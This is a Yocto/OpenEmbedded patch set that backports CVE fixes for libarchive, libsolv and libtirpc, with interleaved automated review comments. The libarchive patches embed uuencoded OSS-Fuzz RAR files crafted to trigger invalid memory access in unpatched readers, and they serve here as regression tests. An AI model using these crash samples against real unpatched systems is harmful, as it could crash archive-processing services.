+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch
@@ -0,0 +1,121 @@
1From 17f4e83c0f0fc3bacf4b2bbacb01f987bb5aff5f Mon Sep 17 00:00:00 2001
2From: Grzegorz Antoniak <ga@anadoxin.org>
3Date: Fri, 12 Feb 2021 20:18:31 +0100
4Subject: [PATCH] RAR5 reader: fix invalid memory access in some files
5
6RAR5 reader uses several variables to manage the window buffer during
7extraction: the buffer itself (`window_buf`), the current size of the
8window buffer (`window_size`), and a helper variable (`window_mask`)
9that is used to constrain read and write offsets to the window buffer.
10
11Some specially crafted files can force the unpacker to update the
12`window_mask` variable to a value that is out of sync with current
13buffer size. If the `window_mask` will be bigger than the actual buffer
14size, then an invalid access operation can happen (SIGSEGV).
15
16This commit ensures that if the `window_size` and `window_mask` will be
17changed, the window buffer will be reallocated to the proper size, so no
18invalid memory operation should be possible.
19
20This commit contains a test file from OSSFuzz #30442.
21
22Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-2.patch?h=applied/3.4.3-2ubuntu0.1]
23CVE: CVE-2021-36976
24Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
25
26---
27 Makefile.am | 1 +
28 libarchive/archive_read_support_format_rar5.c | 27 ++++++++++++++-----
29 libarchive/test/test_read_format_rar5.c | 17 ++++++++++++
30 ...mat_rar5_window_buf_and_size_desync.rar.uu | 11 ++++++++
31 4 files changed, 50 insertions(+), 6 deletions(-)
32 create mode 100644 libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu
33
34--- a/Makefile.am
35+++ b/Makefile.am
36@@ -884,6 +884,7 @@ libarchive_test_EXTRA_DIST=\
37 libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \
38 libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
39 libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
40+ libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \
41 libarchive/test/test_read_format_raw.bufr.uu \
42 libarchive/test/test_read_format_raw.data.gz.uu \
43 libarchive/test/test_read_format_raw.data.Z.uu \
44--- a/libarchive/archive_read_support_format_rar5.c
45+++ b/libarchive/archive_read_support_format_rar5.c
46@@ -1730,14 +1730,29 @@ static int process_head_file(struct arch
47 }
48 }
49
50- /* If we're currently switching volumes, ignore the new definition of
51- * window_size. */
52- if(rar->cstate.switch_multivolume == 0) {
53- /* Values up to 64M should fit into ssize_t on every
54- * architecture. */
55- rar->cstate.window_size = (ssize_t) window_size;
56+ if(rar->cstate.window_size < (ssize_t) window_size &&
57+ rar->cstate.window_buf)
58+ {
59+ /* If window_buf has been allocated before, reallocate it, so
60+ * that its size will match new window_size. */
61+
62+ uint8_t* new_window_buf =
63+ realloc(rar->cstate.window_buf, window_size);
64+
65+ if(!new_window_buf) {
66+ archive_set_error(&a->archive, ARCHIVE_ERRNO_PROGRAMMER,
67+ "Not enough memory when trying to realloc the window "
68+ "buffer.");
69+ return ARCHIVE_FATAL;
70+ }
71+
72+ rar->cstate.window_buf = new_window_buf;
73 }
74
75+ /* Values up to 64M should fit into ssize_t on every
76+ * architecture. */
77+ rar->cstate.window_size = (ssize_t) window_size;
78+
79 if(rar->file.solid > 0 && rar->file.solid_window_size == 0) {
80 /* Solid files have to have the same window_size across
81 whole archive. Remember the window_size parameter
82--- a/libarchive/test/test_read_format_rar5.c
83+++ b/libarchive/test/test_read_format_rar5.c
84@@ -1206,6 +1206,23 @@ DEFINE_TEST(test_read_format_rar5_differ
85 EPILOGUE();
86 }
87
88+DEFINE_TEST(test_read_format_rar5_window_buf_and_size_desync)
89+{
90+ /* oss fuzz 30442 */
91+
92+ char buf[4096];
93+ PROLOGUE("test_read_format_rar5_window_buf_and_size_desync.rar");
94+
95+ /* Return codes of those calls are ignored, because this sample file
96+ * is invalid. However, the unpacker shouldn't produce any SIGSEGV
97+ * errors during processing. */
98+
99+ (void) archive_read_next_header(a, &ae);
100+ while(0 < archive_read_data(a, buf, 46)) {}
101+
102+ EPILOGUE();
103+}
104+
105 DEFINE_TEST(test_read_format_rar5_arm_filter_on_window_boundary)
106 {
107 char buf[4096];
108--- /dev/null
109+++ b/libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu
110@@ -0,0 +1,11 @@
111+begin 644 test_read_format_rar5_window_buf_and_size_desync.rar
112+M4F%R(1H'`0`]/-[E`@$`_P$`1#[Z5P("`PL``BXB"?\`!(@B@0`)6.-AF?_1
113+M^0DI&0GG(F%R(0<:)`!3@"KT`P+G(@O_X[\``#&``(?!!0$$[:L``$.M*E)A
114+M<B$`O<\>P0";/P1%``A*2DI*2DYQ<6TN9'%*2DI*2DI*``!D<F--``````"Z
115+MNC*ZNKJZNFYO=&%I;+JZNKJZNKJZOKJZ.KJZNKJZNKKZU@4%````0$!`0$!`
116+M0$!`0$!`0$!`0$#_________/T#`0$!`0$!`-UM`0$!`0$!`0$!`0$!`0$!`
117+M0$!`0'!,J+:O!IZ-WN4'@`!3*F0`````````````````````````````````
118+M``````````````#T`P)287(A&@<!`%.`*O0#`N<B`_,F@`'[__\``(`4`01S
119+J'`/H/O\H@?\D`#O9GIZ>GN<B"_]%``(``&1RGIZ>GIZ>8_^>GE/_``!.
120+`
121+end
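Review bot: `realloc()` in `process_head_file` leaves the bytes between the old and the new `window_size` uninitialised, so if the decoder can copy from window positions it has not written yet, stale heap content could end up in extracted data; how the buffer is first allocated is outside the hunk. Zeroing the new tail before `window_size` is updated would close that, e.g. `memset(new_window_buf + rar->cstate.window_size, 0, window_size - rar->cstate.window_size);`. The hunk also removes the `switch_multivolume == 0` condition and does not touch `window_mask`, so it should be confirmed that the mask is recomputed wherever it is derived. The allocation failure is reported with `ARCHIVE_ERRNO_PROGRAMMER`; `ENOMEM` would describe it better.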
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch
new file mode 100644
index 0000000000..0e1549f229
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch
@@ -0,0 +1,93 @@
1From 313bcd7ac547f7cc25945831f63507420c0874d7 Mon Sep 17 00:00:00 2001
2From: Grzegorz Antoniak <ga@anadoxin.org>
3Date: Sat, 13 Feb 2021 10:13:22 +0100
4Subject: [PATCH] RAR5 reader: add more checks for invalid extraction
5 parameters
6
7Some specially crafted files declare invalid extraction parameters that
8can confuse the RAR5 reader.
9
10One of the arguments is the declared window size parameter that the
11archive file can declare for each file stored in the archive. Some
12crafted files declare window size equal to 0, which is clearly wrong.
13
14This commit adds additional safety checks decreasing the tolerance of
15the RAR5 format.
16
17This commit also contains OSSFuzz sample #30459.
18---
19 Makefile.am | 1 +
20 libarchive/archive_read_support_format_rar5.c | 10 ++++++++++
21 libarchive/test/test_read_format_rar5.c | 19 +++++++++++++++++++
22 ...t_rar5_bad_window_sz_in_mltarc_file.rar.uu | 7 +++++++
23 4 files changed, 37 insertions(+)
24 create mode 100644 libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu
25
26Upstream-Status: Backport [https://github.com/libarchive/libarchive/pull/1493/commits/313bcd7ac547f7cc25945831f63507420c0874d7]
27CVE: CVE-2021-36976
28Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
29
30--- libarchive-3.4.2.orig/Makefile.am
31+++ libarchive-3.4.2/Makefile.am
32@@ -882,6 +882,7 @@ libarchive_test_EXTRA_DIST=\
33 libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
34 libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
35 libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \
36+ libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu \
37 libarchive/test/test_read_format_raw.bufr.uu \
38 libarchive/test/test_read_format_raw.data.gz.uu \
39 libarchive/test/test_read_format_raw.data.Z.uu \
40--- libarchive-3.4.2.orig/libarchive/archive_read_support_format_rar5.c
41+++ libarchive-3.4.2/libarchive/archive_read_support_format_rar5.c
42@@ -3637,6 +3637,16 @@ static int do_uncompress_file(struct arc
43 rar->cstate.initialized = 1;
44 }
45
46+ /* Don't allow extraction if window_size is invalid. */
47+ if(rar->cstate.window_size == 0) {
48+ archive_set_error(&a->archive,
49+ ARCHIVE_ERRNO_FILE_FORMAT,
50+ "Invalid window size declaration in this file");
51+
52+ /* This should never happen in valid files. */
53+ return ARCHIVE_FATAL;
54+ }
55+
56 if(rar->cstate.all_filters_applied == 1) {
57 /* We use while(1) here, but standard case allows for just 1
58 * iteration. The loop will iterate if process_block() didn't
59--- libarchive-3.4.2.orig/libarchive/test/test_read_format_rar5.c
60+++ libarchive-3.4.2/libarchive/test/test_read_format_rar5.c
61@@ -1305,3 +1305,22 @@ DEFINE_TEST(test_read_format_rar5_decode
62
63 EPILOGUE();
64 }
65+
66+DEFINE_TEST(test_read_format_rar5_bad_window_size_in_multiarchive_file)
67+{
68+ /* oss fuzz 30459 */
69+
70+ char buf[4096];
71+ PROLOGUE("test_read_format_rar5_bad_window_sz_in_mltarc_file.rar");
72+
73+ /* This file is damaged, so those functions should return failure.
74+ * Additionally, SIGSEGV shouldn't be raised during execution
75+ * of those functions. */
76+
77+ (void) archive_read_next_header(a, &ae);
78+ while(0 < archive_read_data(a, buf, sizeof(buf))) {}
79+ (void) archive_read_next_header(a, &ae);
80+ while(0 < archive_read_data(a, buf, sizeof(buf))) {}
81+
82+ EPILOGUE();
83+}
84--- /dev/null
85+++ libarchive-3.4.2/libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu
86@@ -0,0 +1,7 @@
87+begin 644 test_read_format_rar5_bad_window_size_in_multiarchive_file.rar
88+M4F%R(1H'`0`]/-[E`@$`_R`@1#[Z5P("`PL`("`@@"(`"?\@("#___\@("`@
89+M("`@("`@("`@4X`J]`,"YR(#$($@("`@``$@("`@@<L0("`@("`@("`@("`@
90+M("`@(""LCTJA`P$%`B`@`2!3@"KT`P+G(@,@("`@_P,!!B`@(/___R`@(('+
91+5$"`OX2`@[.SL[.S_("`@("`@("`@
92+`
93+end
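Review bot: The `begin 644` line of the added .uu sample names `test_read_format_rar5_bad_window_size_in_multiarchive_file.rar`, while the sample file itself and the `PROLOGUE(...)` argument use `test_read_format_rar5_bad_window_sz_in_mltarc_file.rar`; if the test harness honours the embedded name the reference file would not be found, so this is worth confirming. Separately, `Upstream-Status`, `CVE` and `Signed-off-by` sit below the `---` diffstat separator in this patch, unlike the two sibling CVE-2021-36976 patches where they precede it, and tools that drop everything after `---` would lose them. The file paths also use `libarchive-3.4.2.orig/` instead of `a/`, which suggests the patch was regenerated locally rather than taken verbatim from the referenced commit.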
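--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch
@@ -0,0 +1,29 @@
+From cfaa28168a07ea4a53276b63068f94fce37d6aff Mon Sep 17 00:00:00 2001
+From: Tim Kientzle <kientzle@acm.org>
+Date: Thu, 24 Mar 2022 10:35:00 +0100
+Subject: [PATCH] ZIP reader: fix possible out-of-bounds read in
+ zipx_lzma_alone_init()
+
+Fixes #1672
+
+CVE: CVE-2022-26280
+Upstream-Status: Backport [https://github.com/libarchive/libarchive/commit/cfaa28168a07ea4a53276b63068f94fce37d6aff]
+Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
+
+---
+ libarchive/archive_read_support_format_zip.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/libarchive/archive_read_support_format_zip.c b/libarchive/archive_read_support_format_zip.c
+index 38ada70b5..9d6c900b2 100644
+--- a/libarchive/archive_read_support_format_zip.c
++++ b/libarchive/archive_read_support_format_zip.c
+@@ -1667,7 +1667,7 @@ zipx_lzma_alone_init(struct archive_read *a, struct zip *zip)
+ */
+
+ /* Read magic1,magic2,lzma_params from the ZIPX stream. */
+- if((p = __archive_read_ahead(a, 9, NULL)) == NULL) {
++ if(zip->entry_bytes_remaining < 9 || (p = __archive_read_ahead(a, 9, NULL)) == NULL) {
+ archive_set_error(&a->archive, ARCHIVE_ERRNO_FILE_FORMAT,
+ "Truncated lzma data");
+ return (ARCHIVE_FATAL);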
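--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch
@@ -0,0 +1,43 @@
+From 6311080bff566fcc5591dadfd78efb41705b717f Mon Sep 17 00:00:00 2001
+From: obiwac <obiwac@gmail.com>
+Date: Fri, 22 Jul 2022 22:41:10 +0200
+Subject: [PATCH] CVE-2022-36227
+
+libarchive: CVE-2022-36227 Handle a `calloc` returning NULL (fixes #1754)
+
+Upstream-Status: Backport [https://github.com/libarchive/libarchive/commit/bff38efe8c110469c5080d387bec62a6ca15b1a5]
+CVE: CVE-2022-36227
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com
+---
+ libarchive/archive_write.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/libarchive/archive_write.c b/libarchive/archive_write.c
+index 98a55fb..7fe88b6 100644
+--- a/libarchive/archive_write.c
++++ b/libarchive/archive_write.c
+@@ -211,6 +211,10 @@ __archive_write_allocate_filter(struct archive *_a)
+ struct archive_write_filter *f;
+
+ f = calloc(1, sizeof(*f));
++
++ if (f == NULL)
++ return (NULL);
++
+ f->archive = _a;
+ f->state = ARCHIVE_WRITE_FILTER_STATE_NEW;
+ if (a->filter_first == NULL)
+@@ -527,6 +531,10 @@ archive_write_open(struct archive *_a, void *client_data,
+ a->client_data = client_data;
+
+ client_filter = __archive_write_allocate_filter(_a);
++
++ if (client_filter == NULL)
++ return (ARCHIVE_FATAL);
++
+ client_filter->open = archive_write_client_open;
+ client_filter->write = archive_write_client_write;
+ client_filter->close = archive_write_client_close;
+--
+2.25.1
+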
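Review bot: `archive_write_open` now returns `ARCHIVE_FATAL` when `__archive_write_allocate_filter` yields NULL, but no error is recorded on the archive, so the caller sees a failure with an empty or stale error string; adding `archive_set_error(&a->archive, ENOMEM, "Can't allocate filter");` before the return would fix that. Other callers of `__archive_write_allocate_filter` are not part of this patch and presumably still dereference the result unchecked, which should be verified. In the patch header the `Signed-off-by` address lacks its closing `>`, and the commit id in the `From` line differs from the one given in `Upstream-Status`.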
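--- a/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
+++ b/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
@@ -32,11 +32,23 @@ PACKAGECONFIG[mbedtls] = "--with-mbedtls,--without-mbedtls,mbedtls,"
 
 EXTRA_OECONF += "--enable-largefile"
 
-SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz"
+SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz \
+ file://CVE-2021-36976-1.patch \
+ file://CVE-2021-36976-2.patch \
+ file://CVE-2021-36976-3.patch \
+ file://CVE-2021-23177.patch \
+ file://CVE-2021-31566-01.patch \
+ file://CVE-2021-31566-02.patch \
+ file://CVE-2022-26280.patch \
+ file://CVE-2022-36227.patch \
+"
 
 SRC_URI[md5sum] = "d953ed6b47694dadf0e6042f8f9ff451"
 SRC_URI[sha256sum] = "b60d58d12632ecf1e8fad7316dc82c6b9738a35625746b47ecdcaf4aed176176"
 
+# upstream-wontfix: upstream has documented that reported function is not thread-safe
+CVE_CHECK_WHITELIST += "CVE-2023-30571"
+
 inherit autotools update-alternatives pkgconfig
 
 CPPFLAGS += "-I${WORKDIR}/extra-includes"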
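Review bot: The rewritten `SRC_URI` line still fetches the tarball over plain `http://`, so the integrity of the download rests entirely on the pinned `SRC_URI[sha256sum]`; the `md5sum` entry adds nothing against tampering. If the host serves the same path over TLS, `SRC_URI = "https://libarchive.org/downloads/libarchive-${PV}.tar.gz \` would be the safer form. The `CVE_CHECK_WHITELIST` entry for CVE-2023-30571 carries a rationale comment, which is good; a link to the upstream statement it refers to would make the exemption auditable.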
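--- a/meta/recipes-extended/libnsl/libnsl2_git.bb
+++ b/meta/recipes-extended/libnsl/libnsl2_git.bb
@@ -14,7 +14,7 @@ PV = "1.2.0+git${SRCPV}"
 
 SRCREV = "4a062cf4180d99371198951e4ea5b4550efd58a3"
 
-SRC_URI = "git://github.com/thkukuk/libnsl \
+SRC_URI = "git://github.com/thkukuk/libnsl;branch=master;protocol=https \
  "
 
 S = "${WORKDIR}/git"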
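--- a/meta/recipes-extended/libnss-nis/libnss-nis.bb
+++ b/meta/recipes-extended/libnss-nis/libnss-nis.bb
@@ -13,11 +13,11 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
 SECTION = "libs"
 DEPENDS += "libtirpc libnsl2"
 
-PV = "3.1+git${SRCPV}"
+PV = "3.2"
 
-SRCREV = "062f31999b35393abf7595cb89dfc9590d5a42ad"
+SRCREV = "cd0d391af9535b56e612ed227c1b89be269f3d59"
 
-SRC_URI = "git://github.com/thkukuk/libnss_nis \
+SRC_URI = "git://github.com/thkukuk/libnss_nis;branch=master;protocol=https \
  "
 
 S = "${WORKDIR}/git"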
diff --git a/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch b/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch
new file mode 100644
index 0000000000..fa577fd533
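--- /dev/null
+++ b/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch
@@ -0,0 +1,82 @@
+From 0077ef29eb46d2e1df2f230fc95a1d9748d49dec Mon Sep 17 00:00:00 2001
+From: Michael Schroeder <mls@suse.de>
+Date: Mon, 14 Dec 2020 11:12:00 +0100
+Subject: [PATCH] testcase_read: error out if repos are added or the system is
+ changed too late
+
+We must not add new solvables after the considered map was created, the solver
+was created, or jobs were added. We may not changed the system after jobs have
+been added.
+
+(Jobs may point inside the whatproviedes array, so we must not invalidate this
+area.)
+
+Upstream-Status: Backport [https://github.com/openSUSE/libsolv/commit/0077ef29eb46d2e1df2f230fc95a1d9748d49dec]
+CVE: CVE-2021-3200
+CVE: CVE-2021-33928
+CVE: CVE-2021-33929
+CVE: CVE-2021-33930
+CVE: CVE-2021-33938
+CVE: CVE-2021-44568
+CVE: CVE-2021-44569
+CVE: CVE-2021-44570
+CVE: CVE-2021-44571
+CVE: CVE-2021-44573
+CVE: CVE-2021-44574
+CVE: CVE-2021-44575
+CVE: CVE-2021-44576
+CVE: CVE-2021-44577
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ ext/testcase.c | 21 +++++++++++++++++++++
+ 1 file changed, 21 insertions(+)
+
+diff --git a/ext/testcase.c b/ext/testcase.c
+index 0be7a213..8fb6d793 100644
+--- a/ext/testcase.c
++++ b/ext/testcase.c
+@@ -1991,6 +1991,7 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
+ Id *genid = 0;
+ int ngenid = 0;
+ Queue autoinstq;
++ int oldjobsize = job ? job->count : 0;
+
+ if (resultp)
+ *resultp = 0;
+@@ -2065,6 +2066,21 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
+ int prio, subprio;
+ const char *rdata;
+
++ if (pool->considered)
++ {
++ pool_error(pool, 0, "testcase_read: cannot add repos after packages were disabled");
++ continue;
++ }
++ if (solv)
++ {
++ pool_error(pool, 0, "testcase_read: cannot add repos after the solver was created");
++ continue;
++ }
++ if (job && job->count != oldjobsize)
++ {
++ pool_error(pool, 0, "testcase_read: cannot add repos after jobs have been created");
++ continue;
++ }
+ prepared = 0;
+ if (!poolflagsreset)
+ {
+@@ -2125,6 +2141,11 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
+ int i;
+
+ /* must set the disttype before the arch */
++ if (job && job->count != oldjobsize)
++ {
++ pool_error(pool, 0, "testcase_read: cannot change the system after jobs have been created");
++ continue;
++ }
+ prepared = 0;
+ if (strcmp(pieces[2], "*") != 0)
+ {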
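Review bot: The fourteen `CVE:` tags at patch lines 15-28 hang on a single upstream commit with no sentence saying why one change to `testcase_read` resolves all of them, and those tags are what cve-check reads to report an id as patched. I would add one line above the tags, for example `All CVEs below were reported against testcase_read() and are addressed by this upstream commit.`, once that has been confirmed against the upstream report for each id. The new `pool_error(...); continue;` guards sit inside `testcase_read`, whose body starts and ends outside the hunks shown, so whether the recorded error reaches the caller cannot be judged from this page.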
diff --git a/meta/recipes-extended/libsolv/libsolv_0.7.10.bb b/meta/recipes-extended/libsolv/libsolv_0.7.10.bb
index 265a27c00d..2c2aedc32c 100644
--- a/meta/recipes-extended/libsolv/libsolv_0.7.10.bb
+++ b/meta/recipes-extended/libsolv/libsolv_0.7.10.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Library for solving packages and reading repositories" 1SUMMARY = "Library for solving packages and reading repositories"
2DESCRIPTION = "This is libsolv, a free package dependency solver using a satisfiability algorithm for solving packages and reading repositories"
2HOMEPAGE = "https://github.com/openSUSE/libsolv" 3HOMEPAGE = "https://github.com/openSUSE/libsolv"
3BUGTRACKER = "https://github.com/openSUSE/libsolv/issues" 4BUGTRACKER = "https://github.com/openSUSE/libsolv/issues"
4SECTION = "devel" 5SECTION = "devel"
@@ -7,7 +8,8 @@ LIC_FILES_CHKSUM = "file://LICENSE.BSD;md5=62272bd11c97396d4aaf1c41bc11f7d8"
7 8
8DEPENDS = "expat zlib" 9DEPENDS = "expat zlib"
9 10
10SRC_URI = "git://github.com/openSUSE/libsolv.git \ 11SRC_URI = "git://github.com/openSUSE/libsolv.git;branch=master;protocol=https \
12 file://CVE-2021-3200.patch \
11" 13"
12 14
13SRCREV = "605dd2645ef899e2b7c95709476fb51e28d7e378" 15SRCREV = "605dd2645ef899e2b7c95709476fb51e28d7e378"
diff --git a/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch b/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch
new file mode 100644
index 0000000000..c78e7ef4d5
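--- /dev/null
+++ b/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch
@@ -0,0 +1,155 @@
+From 48309e7cb230fc539c3edab0b3363f8ce973194f Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 28 Jul 2022 09:11:04 +0530
+Subject: [PATCH] CVE-2021-46828
+
+Upstream-Status: Backport [http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed}
+CVE: CVE-2021-46828
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/svc.c | 17 +++++++++++++-
+ src/svc_vc.c | 62 +++++++++++++++++++++++++++++++++++++++++++++++++++-
+ 2 files changed, 77 insertions(+), 2 deletions(-)
+
+diff --git a/src/svc.c b/src/svc.c
+index 6db164b..3a8709f 100644
+--- a/src/svc.c
++++ b/src/svc.c
+@@ -57,7 +57,7 @@
+
+ #define max(a, b) (a > b ? a : b)
+
+-static SVCXPRT **__svc_xports;
++SVCXPRT **__svc_xports;
+ int __svc_maxrec;
+
+ /*
+@@ -194,6 +194,21 @@ __xprt_do_unregister (xprt, dolock)
+ rwlock_unlock (&svc_fd_lock);
+ }
+
++int
++svc_open_fds()
++{
++ int ix;
++ int nfds = 0;
++
++ rwlock_rdlock (&svc_fd_lock);
++ for (ix = 0; ix < svc_max_pollfd; ++ix) {
++ if (svc_pollfd[ix].fd != -1)
++ nfds++;
++ }
++ rwlock_unlock (&svc_fd_lock);
++ return (nfds);
++}
++
+ /*
+ * Add a service program to the callout list.
+ * The dispatch routine will be called when a rpc request for this
+diff --git a/src/svc_vc.c b/src/svc_vc.c
+index c23cd36..1729963 100644
+--- a/src/svc_vc.c
++++ b/src/svc_vc.c
+@@ -64,6 +64,8 @@
+
+
+ extern rwlock_t svc_fd_lock;
++extern SVCXPRT **__svc_xports;
++extern int svc_open_fds();
+
+ static SVCXPRT *makefd_xprt(int, u_int, u_int);
+ static bool_t rendezvous_request(SVCXPRT *, struct rpc_msg *);
+@@ -82,6 +84,7 @@ static void svc_vc_ops(SVCXPRT *);
+ static bool_t svc_vc_control(SVCXPRT *xprt, const u_int rq, void *in);
+ static bool_t svc_vc_rendezvous_control (SVCXPRT *xprt, const u_int rq,
+ void *in);
++static int __svc_destroy_idle(int timeout);
+
+ struct cf_rendezvous { /* kept in xprt->xp_p1 for rendezvouser */
+ u_int sendsize;
+@@ -312,13 +315,14 @@ done:
+ return (xprt);
+ }
+
++
+ /*ARGSUSED*/
+ static bool_t
+ rendezvous_request(xprt, msg)
+ SVCXPRT *xprt;
+ struct rpc_msg *msg;
+ {
+- int sock, flags;
++ int sock, flags, nfds, cnt;
+ struct cf_rendezvous *r;
+ struct cf_conn *cd;
+ struct sockaddr_storage addr;
+@@ -378,6 +382,16 @@ again:
+
+ gettimeofday(&cd->last_recv_time, NULL);
+
++ nfds = svc_open_fds();
++ if (nfds >= (_rpc_dtablesize() / 5) * 4) {
++ /* destroy idle connections */
++ cnt = __svc_destroy_idle(15);
++ if (cnt == 0) {
++ /* destroy least active */
++ __svc_destroy_idle(0);
++ }
++ }
++
+ return (FALSE); /* there is never an rpc msg to be processed */
+ }
+
+@@ -819,3 +833,49 @@ __svc_clean_idle(fd_set *fds, int timeout, bool_t cleanblock)
+ {
+ return FALSE;
+ }
++
++static int
++__svc_destroy_idle(int timeout)
++{
++ int i, ncleaned = 0;
++ SVCXPRT *xprt, *least_active;
++ struct timeval tv, tdiff, tmax;
++ struct cf_conn *cd;
++
++ gettimeofday(&tv, NULL);
++ tmax.tv_sec = tmax.tv_usec = 0;
++ least_active = NULL;
++ rwlock_wrlock(&svc_fd_lock);
++
++ for (i = 0; i <= svc_max_pollfd; i++) {
++ if (svc_pollfd[i].fd == -1)
++ continue;
++ xprt = __svc_xports[i];
++ if (xprt == NULL || xprt->xp_ops == NULL ||
++ xprt->xp_ops->xp_recv != svc_vc_recv)
++ continue;
++ cd = (struct cf_conn *)xprt->xp_p1;
++ if (!cd->nonblock)
++ continue;
++ if (timeout == 0) {
++ timersub(&tv, &cd->last_recv_time, &tdiff);
++ if (timercmp(&tdiff, &tmax, >)) {
++ tmax = tdiff;
++ least_active = xprt;
++ }
++ continue;
++ }
++ if (tv.tv_sec - cd->last_recv_time.tv_sec > timeout) {
++ __xprt_unregister_unlocked(xprt);
++ __svc_vc_dodestroy(xprt);
++ ncleaned++;
++ }
++ }
++ if (timeout == 0 && least_active != NULL) {
++ __xprt_unregister_unlocked(least_active);
++ __svc_vc_dodestroy(least_active);
++ ncleaned++;
++ }
++ rwlock_unlock(&svc_fd_lock);
++ return (ncleaned);
++}
+--
+2.25.1
+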
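Review bot: `__svc_destroy_idle` walks the poll table with `i <= svc_max_pollfd`, while `svc_open_fds`, added by the same patch, stops at `ix < svc_max_pollfd`; if `svc_max_pollfd` is an element count, the `<=` form reads `svc_pollfd[i]` and `__svc_xports[i]` one slot past the end while holding the write lock. The definition of `svc_max_pollfd` is not on this page, so this needs checking against svc.c; if it is a count, the loop should read `for (i = 0; i < svc_max_pollfd; i++) {`, with the deviation from the upstream commit recorded in the patch header. Separately, the `Upstream-Status:` line opens its reference with `[` but closes it with `}`; the closing character should be `]`.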
diff --git a/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb b/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb
index 10a324c3b6..80151ff83a 100644
--- a/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb
+++ b/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb
@@ -9,7 +9,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f835cce8852481e4b2bbbdd23b5e47f3 \
9 9
10PROVIDES = "virtual/librpc" 10PROVIDES = "virtual/librpc"
11 11
12SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BP}.tar.bz2" 12SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BP}.tar.bz2 \
13 file://CVE-2021-46828.patch \
14 "
13UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/libtirpc/files/libtirpc/" 15UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/libtirpc/files/libtirpc/"
14UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)/" 16UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)/"
15SRC_URI[md5sum] = "b25f9cc18bfad50f7c446c77f4ae00bb" 17SRC_URI[md5sum] = "b25f9cc18bfad50f7c446c77f4ae00bb"
@@ -20,7 +22,7 @@ inherit autotools pkgconfig
20EXTRA_OECONF = "--disable-gssapi" 22EXTRA_OECONF = "--disable-gssapi"
21 23
22do_install_append() { 24do_install_append() {
23 chown root:root ${D}${sysconfdir}/netconfig 25 test -e ${D}${sysconfdir}/netconfig && chown root:root ${D}${sysconfdir}/netconfig
24} 26}
25 27
26BBCLASSEXTEND = "native nativesdk" 28BBCLASSEXTEND = "native nativesdk"
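Review bot: The guarded `chown` in `do_install_append` is written as `test -e ... && chown ...` and is the last command of the function, so when `netconfig` is absent the list evaluates to non-zero and that becomes the function's exit status. If the task shell runs with errexit, as BitBake shell tasks normally do, the task may then fail in exactly the case the guard was added for. An explicit conditional avoids this: `if [ -e ${D}${sysconfdir}/netconfig ]; then chown root:root ${D}${sysconfdir}/netconfig; fi`.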
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
index f17bdce2c0..44b9136b05 100644
